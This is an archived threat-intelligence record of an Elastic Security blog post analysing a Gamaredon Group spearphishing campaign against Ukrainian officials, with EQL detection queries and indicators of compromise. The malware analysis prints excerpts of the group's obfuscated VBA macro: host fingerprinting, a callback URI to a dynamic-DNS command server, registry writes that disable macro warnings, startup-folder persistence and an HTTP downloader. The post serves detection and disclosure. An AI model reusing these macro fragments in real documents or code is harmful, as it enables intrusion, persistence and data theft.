{ "id": "81a0dfca-8635-4ec5-8210-31e856fd3a3f", "created_at": "2026-04-06T00:08:14.53884Z", "updated_at": "2026-04-10T13:12:56.777003Z", "deleted_at": null, "sha1_hash": "efba480dd620ad7230886608631de2131fd524ba", "title": "Playing defense against Gamaredon Group", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 627431, "plain_text": "Playing defense against Gamaredon Group\r\nBy Daniel Stepanic, Andrew Pease, Seth Goodwin, Elastic Security Intelligence \u0026 Analytics Team\r\nPublished: 2022-06-21 · Archived: 2026-04-05 19:17:52 UTC\r\nFor several months, the Intelligence \u0026 Analytics team at Elastic Security has tracked an ongoing adversary\r\ncampaign appearing to target Ukranian government officials. Based on our monitoring, we believe Gamaredon\r\nGroup, a suspected Russia-based threat group, is behind this campaign. Our observations suggest a significant\r\noverlap between tactics, techniques, and procedures (TTPs) included within this campaign and public reporting1.\r\nThis campaign has produced and deployed updated lures on a near-daily basis that appear to target multiple\r\nUkrainian government departments. With this high operational tempo and aggressive targeting, they consistently\r\nemploy a cluster of initial access techniques and procedures. Over the past four months, these techniques have\r\nconsisted of spearphishing, remote document template injection, startup folder persistence, VBA/VBScript\r\nlanguages, and Dynamic DNS command \u0026 control infrastructure.\r\nIn this post, we’ll walk through the campaign details, reviewing the implementation while also providing solutions\r\nsuch as detection strategies through the use of Elastic’s Event Query Language (EQL).\r\nCampaign Details\r\nThe earliest identified infrastructure indicates this campaign has been active since August 2019. The first sample\r\nleveraging this domain was submitted to VirusTotal in early September 2019. Spearphishing emails like the\r\nexample in Figure 1 (below) were used to deliver a malicious attachment and demonstrate Gamaredon Group’s\r\nattempt to impersonate an anti-corruption activist. This example targeted the National Security and Defense\r\nCouncil of Ukraine and dates to January 17, 2020.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 1 of 15\n\nFigure 1 - Spearphishing email sent to National Security and Defense Council of Ukraine\r\nA typical lure document might masquerade as an information request to the Ministry of Foreign Affairs of\r\nUkraine. These manufactured lures included official logos stolen from governmental offices of Ukraine and\r\nimpersonated diplomats known to their targets.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 2 of 15\n\nFigure 2 - Lure document - Ministry of Foreign Affairs in Ukraine request\r\nTo improve their chances of success, they customize the request around the same date of the campaign and include\r\nurgent requests for action. These efforts are indicative of necessity.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 3 of 15\n\nFigure 3 - Lure document - Information request related to NSDC Head of Ukraine\r\nOften, the call to action first required the victim to open an attached lure document. A user who attempted to open\r\none of these malicious attachments would see a perfectly convincing decoy document, while a sequence of\r\ninvisible actions occurred behind the screen. These documents end up leveraging a technique known as template\r\ninjection, a method of loading remotely hosted Microsoft Word document templates.\r\nMicrosoft Word objects function similarly to compressed archives and have properties defined using Microsoft’s\r\nOpen Office XML (OOXML) format. Within the decompressed word/_rels/ subdirectory, the file settings.xml.rels\r\ncontained a network location where a remotely hosted template was retrieved as depicted in Figure 4.\r\nFigure 4 - Excerpt from Settings.xml.rels\r\nEach external URL within these lures were configured to point to Dynamic DNS providers (ddns.net, hopto.org).\r\nDynamic DNS provides automation around updating a name server in the Domain Name System (DNS). By\r\nadopting this technique, this shows the adversary’s attempt to mask their ownership and obscure atomic indicator\r\nassociations through the use of transient infrastructures, such as Dynamic DNS.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 4 of 15\n\nFigure 5 - Word startup screen showing download of remote document template\r\nThe remote templates are macro-enabled, configured to execute VBA macro code that persists a VBScript object\r\nin the victim’s startup folder as a foothold. We assess the objective of this initial code is used to identify the victim\r\nand to protect the second-stage payload that is intended only for their targeted victims. In the next sections, we\r\nwill review the document’s metadata and macro code found in a recent sample.\r\nDocument metadata analysis\r\nIn malicious campaigns, infrastructure is commonly created for specific targets. This serves multiple purposes, but\r\nfrequently it’s done to track implants and frustrate automated research and analysis. As analysts, this gives us\r\nsome insight into the adversaries’ maturity, experience, and resources. As an example, an adversary who reuses\r\nlure documents or templates may be less experienced, not interested in high-value targets, or using monetized\r\ninfrastructure from previous campaigns.\r\nAnalyzing the metadata from the lure document and template allows us to see when these weaponized documents\r\nwere created, as well as identify any associations between different elements of the campaign.\r\nAs we can see in Figure 6, the lure document was created on December 24, 2019 by the Author “ШУРИК”. In\r\nFigure 7, we can see that the Author is the same as observed in the lure document (ШУРИК). Additionally, we can\r\nsee that the remote template was created on December 12, 2019 and then modified on December 24, 2019. There\r\nwere 5 modifications to it, indicating that it has been used for 5 campaigns in 12 days — or about 2.5 days per\r\ncampaign. With moderate confidence, this tells us that the remote template is likely reused and updated with new\r\nmacros for new campaigns, and that they were created by the same Author (or at a minimum, the same instance of\r\nMicrosoft Word).\r\nAs an analyst note, we see different tool markings that indicate this was created by a Russian speaker (Russian\r\nAuthor, Russian Language Code, Cyrillic character set, and the usage of Reanimator Extreme Edition). While we\r\ncan use those as information to help inform overall analysis, this information can be seeded — so it doesn’t prove\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 5 of 15\n\nanything definitively on its own. In this case, this aligns with other open source analysis linking this to the\r\nGamaredon Group, which is believed to be Russian in origin.\r\nFile Size 46 kB\r\nFile Type Extension docx\r\nMIME Type application/vnd.openxmlformats-officedocument.wordprocessingml.document\r\nLast Modified By ШУРИК\r\nRevision Number 2\r\nCreate Date 2019:12:24 15:58:00Z\r\nModify Date 2019:12:24 16:10:00Z\r\nTemplate pos.dot\r\nTotal Edit Time 2 minutes\r\nPages 1\r\nWords 195\r\nCharacters 1114\r\nApplication Microsoft Office Word\r\nLines 9\r\nParagraphs 2\r\nCompany Reanimator Extreme Edition\r\nCharacters With Spaces 1307\r\nFigure 6 - Metadata from the lure document (truncated for length)\r\nFile Size 44 kB\r\nFile Type Extension doc\r\nMIME Type application/msword\r\nLanguage Code Russian\r\nAuthor ШУРИК\r\nTemplate pos.dot\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 6 of 15\n\nLast Modified By ШУРИК\r\nSoftware Microsoft Office Word\r\nCreate Date 2019:12:12 11:48:00\r\nModify Date 2019:12:24 10:30:00\r\nCode Page Windows Cyrillic\r\nCompany Reanimator Extreme Edition\r\nChar Count With Spaces 0\r\nRevision Number 5\r\nTotal Edit Time 0\r\nWords 0\r\nCharacters 0\r\nPages 1\r\nParagraphs 1\r\nLines 1\r\nFigure 7 - Metadata from the remote template (truncated for length)\r\nWhile we cannot state with any authority, searching for the Author “ШУРИК” has identified similar TTPs (lure\r\ndocuments with remote template injection) as far back as September of 2019.\r\nMacro code analysis\r\nThe macro code was obfuscated using string concatenation and procedurally generated variables — techniques\r\nthat are often used to bypass static detection technologies. Upon execution, this code provides reverse shell\r\nfunctionality that allows an adversary access to the victim’s system and capability to access shared resources on\r\ntheir local network. Figure 8 contains an excerpt of the macro that depicts the creation of a reverse shell and some\r\nof the system information collected automatically.\r\nDim NoARzTHy\r\nNoARzTHy = \"Set WShell=CreateObject(\"\"WSc\" + \"ri\" + \"pt.S\" + \"hel\" + \"l\"\")\"\r\nSet PWFJWatF = CreateObject(\"WScr\" + \"ipt.Ne\" + \"two\" + \"rk\")\r\nDim pbuvwTLK, JzESywut\r\nSet GGZucIZE = CreateObject(\"Sc\" + \"rip\" + \"ting.Fi\" + \"leSy\" + \"stemOb\" + \"ject\")\r\npbuvwTLK = GGZucIZE.Drives(Environ(\"Syst\" + \"emDri\" + \"ve\")).SerialNumber\r\nOYTgBXAP = PWFJWatF.ComputerName\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 7 of 15\n\nFigure 8 - First 7 lines of macro code from the loaded document template\r\nFigure 9 shows an excerpt of the same code removing the concatenation.\r\nDim NoARzTHy\r\nNoARzTHy = \"Set WShell=CreateObject(\"WScript.Shell\")\"\r\nSet PWFJWatF = CreateObject(\"WScript.Network\")\r\nDim pbuvwTLK, JzESywut\r\nSet GGZucIZE = CreateObject(\"Scripting.FileSystemObject\")\r\npbuvwTLK = GGZucIZE.Drives(Environ(\"SystemDrive\")).SerialNumber\r\nOYTgBXAP = PWFJWatF.ComputerName\r\nFigure 9 - First 7 lines of macro code - Removal of concatenation\r\nThe serial number and hostname of the victim's computer are some of the first pieces of information the VBA\r\ncollects. They are converted to hexadecimal and included in the reverse shell HTTP request to identify both the\r\nimplant and the victim. Figure 10 shows off the configuration of the URI request within the macro and Figure 11\r\nrepresents an example URI.\r\nJzESywut = \"h\" + \"tt\" + \"p:\" + \"//l\" + \"ibcr\" + \"ash.dd\" + \"ns.ne\" + \"t/\" \u0026 OYTgBXAP \u0026 \"_\" \u0026 HFzesifc \u0026 \"//po\"\r\nFigure 10 - URI request configuration - Macro\r\nJzESywut = hxxp://libcrash.ddns[.]net/ENDPOINT1_96L02G3D//posolreboot.php\r\nFigure 11 - URI request configuration - Example\r\nBy default, Microsoft disables external or untrusted macros by setting key values in the registry at\r\nHKCU\\Software\\Microsoft\\Office(VERSION)\\Word\\Security. The first registry modification made by this macro\r\nchanges the key value of AccessVBOM to 1, effectively bypassing the default setting to enable external or\r\nuntrusted macros. The second registry modification enables all macros automatically and disables warnings for\r\nfuture macro-enabled objects. Figure 12 represents the macro code for these registry modifications.\r\nFEDzCjgi$ = \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\" \u0026 Application.Version \u0026 _\"\\Word\\Security\\\"\r\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ \u0026 \"AccessVBOM\", 1, \"REG_DWORD\"\r\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ \u0026 \"VBAWarnings\", 1, \"REG_DWORD\"\r\nFigure 12 - Registry modifications found in macro\r\nThe remaining lines of code end up writing a VBScript file and placing it in the user’s startup directory. Figure 13\r\ncontains an excerpt of the beginning lines of macro code where the VBScript (security.vbs) is written to disk and\r\nplaced in the startup folder.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 8 of 15\n\nDim LISPVdZd As Object\r\nSet LISPVdZd = GGZucIZE.CreateTextFile(FESHWDaD + \"\\Mi\" + \"croso\" + \"ft\\Wi\" + \"ndow\" + \"s\\St\" + \"art Men\" + \"u\\P\r\nFigure 13 - Macro code writing VBScript file (security.vbs)\r\nUpon rebooting or successfully authenticating to an infected system, the persistent VBScript file is automatically\r\nexecuted and a standard HTTP GET is made with the previously observed URI (Figure 14). If the request is\r\nsuccessful, the response body gets stored into another variable. This functionality appears to serve as a\r\ndownloader that has specific subroutine instructions for reassembling a binary on disk. Figure 14 contains an\r\nexcerpt of the function used to construct the HTTP GET request.\r\nFunction TOGeMFBD(iWotBBKf)\r\nOn Error Resume Next\r\nSet EXJJrRlN = CreateObject(\"MSXML2.XMLHTTP\")\r\nWith EXJJrRlN\r\n.Open \"GET\", iWotBBKf, False\r\n.send\r\nEnd With\r\nIf EXJJrRlN.Status = 200 Then\r\nTOGeMFBD = EXJJrRlN.ResponseBody\r\nEnd If\r\nEnd Function\r\nFigure 14 - GET request (security.vbs)\r\nDuring dynamic analysis, analysts identified that the script enters a loop while sending the request. A 0-byte file is\r\ncreated under the infected user’s roaming profile with a procedurally generated file name and text file extension.\r\nThe file is iteratively written and deleted without the contents changing.\r\nAnalysts have not confirmed the purpose of this file, and suspect it is used to reassemble a segmented later-stage\r\nimplant. Potential reasons to obfuscate this process include evading detection and response solutions.\r\nPteranodon update\r\nWhile doing this research, we observed samples and artifacts that appear to be related to an updated version of the\r\nGamaredon Group’s custom backdoor, known as Pteranodon. Although we don’t have substantial evidence that\r\nPteranodon is the final payload victims are infected with during this campaign, we assess with moderate\r\nconfidence that this activity is linked to Gamaredon Group.\r\nThree PE samples were uploaded to VirusTotal last month with each dropping two text files (ExcelMyMacros.vba,\r\nwordMacros.vba). The two text files share several similarities to the VBA macro code found in the remote\r\ntemplates used in this campaign — specifically, the methods of retrieving and hex-encoding the serial number and\r\nsimilar subroutine logic. Figure 15 depicts the VBA macro code from the remote template on the left and the\r\ndropped VBA macro code from a known Pteranodon implant on the right.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 9 of 15\n\nVBA from Campaign\r\nFor LfJesrvH = 0 To UBound( IvAPFGDD )\" + vbCrLf\r\nLISPVdZd.Write \"IvAPFGDD(LfJesrvH) = Asc( Mid( EaCJFwPc, LfJesrvH + 1, 1 ) )\" + vbCrLf\r\nLISPVdZd.Write \"Next\" + vbCrLf\r\nLISPVdZd.Write \"GetFEDzCjgi = IvAPFGDD\" + vbCrLf\r\nVBA from Pteranodon\r\nFor i = 0 To UBound( asrrCodes )\" + vbCrLf\r\nNewVDJKpCBSFile.Write \" asrrCodes(i) = Asc( Mid( myPassPhrase, i + 1, 1 ) )\" + vbCrLf\r\nNewVDJKpCBSFile.Write \" Next\" + vbCrLf\r\nNewVDJKpCBSFile.Write \" GetKey = asrrCodes\" + vbCrLf\r\nFigure 15 - Macro comparison - VBA from Campaign (top) vs VBA from Pteranodon (bottom)\r\nBoth text files contained VBA, and had the same functionality for disabling macro warnings, creating a persistent\r\nVBScript in the startup folder and establishing connections to C2. What’s interesting with the dropped text files\r\n(VBA), is that they show the true variable names used by the developers before their tooling obfuscates the\r\nvariables. At the time of this writing, each of the four C2 servers (see attached indicators) affiliated with\r\nPteranodon samples were currently active and hosted a network allocated to ASN9123 (TIMEWEB LTD). Macro\r\ncode associated with the Gamaredon Group campaign targeting Ukraninan officials called back to C2 hosted in\r\nthe same network.\r\nAn interesting change in some of these artifacts appears to be the adoption of .NET. Along with the two text files\r\ncontaining VBA code, there are three dropped DLL’s (Microsoft.Office.Interop.Excel.dll,\r\nMicrosoft.Office.Interop.Word.dll, Microsoft.Vbe.Interop.dll) and a .NET sample showing dependencies with\r\nthese files. Figure 16 shows a hex-encoded reference to one of the VBA files (wordMacros.txt). Based on these\r\nobservations, it’s intriguing to see Gamaredon Group continue to leverage core functionality of their VBA stager\r\ncode, but in a new method of execution by using .NET\r\nFigure 16 - .NET reference to “wordMacros.txt”\r\nDetection crafting\r\nFor organizations interested in detecting TTPs discussed in this blog post, detection logic has been provided for\r\nthe following categories:\r\nDynamic DNS\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 10 of 15\n\nDynamic DNS enables adversaries to rapidly provision very large numbers of records that map back to their\r\ninfrastructure, creating a confusion layer between victims and adversaries. Gamaredon Group exclusively used\r\nDynamic DNS locations for remotely hosted templates, rotating domains consistently, and leveraging separate\r\ninfrastructure for hosting stagers and templates.\r\nProfiling Dynamic DNS for your enterprise is an amazing way to get started hunting — not just to baseline and\r\nbuild environmental awareness, but also to outright find evil. We will primarily focus on the two Dynamic DNS\r\nproviders observed in relation to this campaign. If you need inspiration, consider counting up all non-browser\r\nprocesses that made a DNS request to one of these Dynamic DNS providers as shown in Figure 17.\r\ndns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\") and\r\nprocess_name not in (\"chrome.exe\",\"iexplore.exe\", \"firefox.exe\")\r\n| count process_name, query_name\r\nFigure 17 - EQL Query - Count of non-browser process to dynamic DNS providers\r\nAnother option examines the processes that most frequently communicate with these providers, and may provide\r\nmore context regarding how dynamic DNS is used in your environment, or enable an analyst to find signs of other\r\nmalicious activity.\r\nnetwork where event of\r\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")\r\n| count process_name, total_in_bytes, total_out_bytes\r\nFigure 18 - EQL query - Network traffic of processes to dynamic DNS providers\r\nTemplate Injection\r\nSpearphishing attachments that utilize template injection may bypass security controls because they contain no\r\nembedded VBA code. The attached document retrieves a remotely hosted template where the malicious VBA code\r\nresides. In order to detect this activity dynamically, analyze DNS and network traffic over common protocols\r\n(HTTP/HTTPS/SMB) and processes generated by Microsoft Office applications. Enterprise defenders may need\r\nto whitelist any legitimate use of remotely hosted templates, or any benign network activity to Microsoft\r\ninfrastructure. Below is an example EQL query focused on new process creation events from Office products that\r\nalso made DNS requests outside our whitelist.\r\nsequence by unique_pid\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\r\n[dns where not wildcard(query_name , \"*.microsoft.com\", \"*.skype.com\")]\r\nFigure 19 - EQL query - DNS traffic from Office applications\r\nSome enhancements we can use with the previous query is to add a network event to the sequence as well as look\r\nfor a spawned child process bringing in more context to the detection.\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 11 of 15\n\nsequence\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")] by unique_pid\r\n[dns where not wildcard(query_name, \"*.microsoft.com\", \"*.skype.com\")] by unique_pid\r\n[network where true] by unique_pid\r\n[process where subtype.create] by unique_ppid\r\nFigure 20 - EQL query - Network traffic making dynamic DNS requests from Office applications\r\nIf we wanted to tailor a sequence-based detection to the Gamaredon Group activity specifically, we can bring in\r\nthe previous Dynamic DNS providers, which creates a more restrictive filter.\r\nsequence by unique_pid\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\r\n[network where event of\r\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")]]\r\nFigure 21 - EQL query - Network traffic making dynamic DNS requests from Office applications\r\nAcross a range of features provided by the Elastic Endpoint, this attack is prevented through different machine-learning technologies to stop advanced threats such as macro-enabled documents and malicious binaries. Along\r\nwith these protections, we can take nearly any EQL logic and deploy it in prevention mode to completely stop an\r\nattack such as in this example with the download and execution of the remote template. Here’s a short clip in\r\naction:\r\nMalicious registry configuration\r\nIn order for adversaries to be effective in their mission, they often create their own opportunities. In this case, the\r\nadversary reconfigured the target endpoint in order to disable macro security warnings and trust future macros\r\nautomatically. These small changes can end up having larger implications, and defenders can look for them as\r\nsymptoms of more serious security issues. For example, these same techniques have also been associated with\r\nthreat groups like APT32 and are leveraged by malware families such as AgentTesla and BabyShark.\r\nThis query looks for evidence of the registry modifications that disable warnings for macros and automatically\r\nenabling future macros:\r\nregistry where registry_data == 1 and wildcard(registry_path,\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")\r\nFigure 22 - EQL query - Registry modifications around disabling macro security features\r\nThat would function perfectly well as a standalone detection, but EQL allows us to look for both the registry\r\nmodification and template injection techniques in this example query:\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 12 of 15\n\nsequence by unique_pid\r\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\r\n[registry where registry_data == 1 and wildcard(registry_path,\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\r\n[registry where registry_data == 1 and wildcard(registry_path,\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\r\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\r\nFigure 23 - EQL query - Registry modifications around disabling macro security features\r\nPersistence startup\r\nGamaredon Group leveraged both malicious Windows shortcut files and script objects written to the Startup folder\r\nfor persistence. This technique is very effective in spite of its simplicity and continues to be popular among\r\nadversaries. One of the first places to start building detection logic would be to inquire about processes that write\r\nfiles to the startup folder.\r\nfile where subtype.create\r\nand (\r\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.lnk\" or\r\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"\r\n)\r\n| count process_name, file_path, user_name\r\nFigure 24 - EQL query - Monitoring file writes to startup folder\r\nTo take it a bit further, we can also customize detection logic to include the VBScript execution at logon. This is a\r\ngreat example for building a sequenced-based signal, as we will track the adversary’s activity over an extended\r\nperiod of time — such as 90 days. Once the machine is rebooted or the user logs back in, an alert can be generated\r\nwhen WScript executes the VBScript file at startup.\r\nsequence with maxspan=90d\r\n[file where subtype.create and file_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"]\r\n[process where subtype.create and parent_process_name==\"explorer.exe\" and\r\nprocess_name == “wscript.exe” and command_line == \"*\\\\Programs\\\\Startup\\\\*\"]\r\nFigure 25 - EQL query - Monitoring execution of startup processes\r\nConclusion\r\nIn this post, we reviewed recent campaign TTPs tied to an adversary known publicly as Gamaredon Group. This\r\ngroup is likely to have been active since at least 2013 and has engaged in an ongoing campaign against Ukraine at\r\nthe time of this writing. We highlighted some of their current techniques such as template injection and the use of\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 13 of 15\n\nDynamic DNS providers, the macro code found in a recent sample, and updates to their custom backdoor known\r\nas Pteranodon. By using EQL, we also shared hunting and detection strategies around four specific techniques\r\nused by Gamaredon Group.\r\nWe hope that by sharing some of these insights and queries, we can help raise awareness and continue to focus on\r\nprotecting the world's data from attacks. To enable organizations further, we’ve added all the Indicators of\r\nCompromise (IOCs) below and added the queries in this post into the EQLLib repository.\r\nInterested in using Elastic Security? Try Elastic SIEM for free.\r\nPlus, EQL support is being added to Elasticsearch!\r\nIndicators of Compromise (IOCs)\r\nLure Document SHA-256 86e0701349903105b0c346df9485dd59d85dd9463c2bee46d974ea1b1d7059d4\r\nRemote Template (pos.dot)\r\nSHA-256\r\nfeb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f\r\nRemote Template from Lure\r\nDocument Domain\r\ndocument-out[.]hopto[.]org/pos[.]dot\r\nRemote Template Hosting\r\nIP\r\n141[.]8[.]195[.]60\r\nRemote Template Hosting\r\nIP\r\n141[.]8[.]192[.]153\r\nSystem Information Upload\r\nIP\r\n188[.]225[.]25[.]50\r\nSystem Information Upload\r\nURI\r\nlibcrash.ddns[.]net/{Computername_SerialNumber}//posolreboot.php\r\nExcelMyMacros.vba SHA-256\r\nc4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e\r\nwordMacros.vba SHA-256 02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d\r\nExcelMyMacros.txt SHA-256\r\n2f310c5b16620d9f6e5d93db52607f21040b4829aa6110e22ac55fab659e9fa1\r\nPteranodon SHA-256 c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f\r\nPteranodon SHA-256 145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd\r\nPteranodon Domain beercraft[.]space\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 14 of 15\n\nPteranodon Domain skymage[.]fun\r\nPteranodon Domain masseffect[.]space\r\nPteranodon Domain masseffect[.]website\r\nPteranodon IP 185[.]200[.]241[.]88\r\nPteranodon IP 188[.]225[.]46[.]94\r\nReferences\r\n1. https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine\r\nSource: https://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nhttps://www.elastic.co/blog/playing-defense-against-gamaredon-group\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.elastic.co/blog/playing-defense-against-gamaredon-group" ], "report_names": [ "playing-defense-against-gamaredon-group" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2864e40a-f233-4618-ac61-b03760a41cbb", "created_at": "2023-12-01T02:02:34.272108Z", "updated_at": "2026-04-10T02:00:04.97558Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "ETDA:WildCard", "tools": [ "RustDown", "SysJoker" ], "source_id": "ETDA", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e", "created_at": "2023-11-30T02:00:07.299845Z", "updated_at": "2026-04-10T02:00:03.484788Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "MISPGALAXY:WildCard", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434094, "ts_updated_at": 1775826776, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/efba480dd620ad7230886608631de2131fd524ba.pdf", "text": "https://archive.orkl.eu/efba480dd620ad7230886608631de2131fd524ba.txt", "img": "https://archive.orkl.eu/efba480dd620ad7230886608631de2131fd524ba.jpg" } }